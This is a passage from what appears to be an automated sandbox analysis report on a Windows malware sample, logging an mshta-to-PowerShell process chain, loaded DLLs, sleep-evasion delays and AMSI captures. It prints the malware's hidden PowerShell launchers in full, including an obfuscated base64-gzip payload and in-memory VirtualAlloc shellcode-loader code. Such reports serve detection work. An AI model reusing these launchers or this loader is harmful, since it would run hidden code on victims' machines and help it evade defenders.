}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7
ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

          Data Obfuscation

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((nkQ kernel32.dll VirtualAlloc), (k6 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $jR5wG.Length,0x3000, 0x04)[System.Runtime.InteropServi
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpT
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7
ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04900AAB push eax; iretd 1_2_04900ACD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_049012D8 push esp; retf 1_2_049012E1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04900AE5 push esp; retf 1_2_04900AEA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02C6C4C8 push 8B07DBEDh; retn 518Dh 3_2_02C6CAA1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02C6955B push eax; ret 3_2_02C69563
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1979
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1140
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5374
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4378
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 5374 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4208 Thread sleep time: -18446744073709540s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 4378 > 30
          Source: powershell.exe, 00000003.00000002.2296504585.00000000070CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\mshta.exe Process created: Base64 decoded if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK''+''SarvytjEOSkL{1}z79fEE8oPpfRXpc{1''+''}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4''+''R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX''+''9zS''+''4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq''+''l+V''+''YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW''+''kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O''+''BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59''+''FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU''+''D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt''+''SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbb
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK''+''SarvytjEOSkL{1}z79fEE8oPpfRXpc{1''+''}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4''+''R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX''+''9zS''+''4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq''+''l+V''+''YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW''+''kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O''+''BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59''+''FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU''+''D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt''+''SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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 to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7
ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
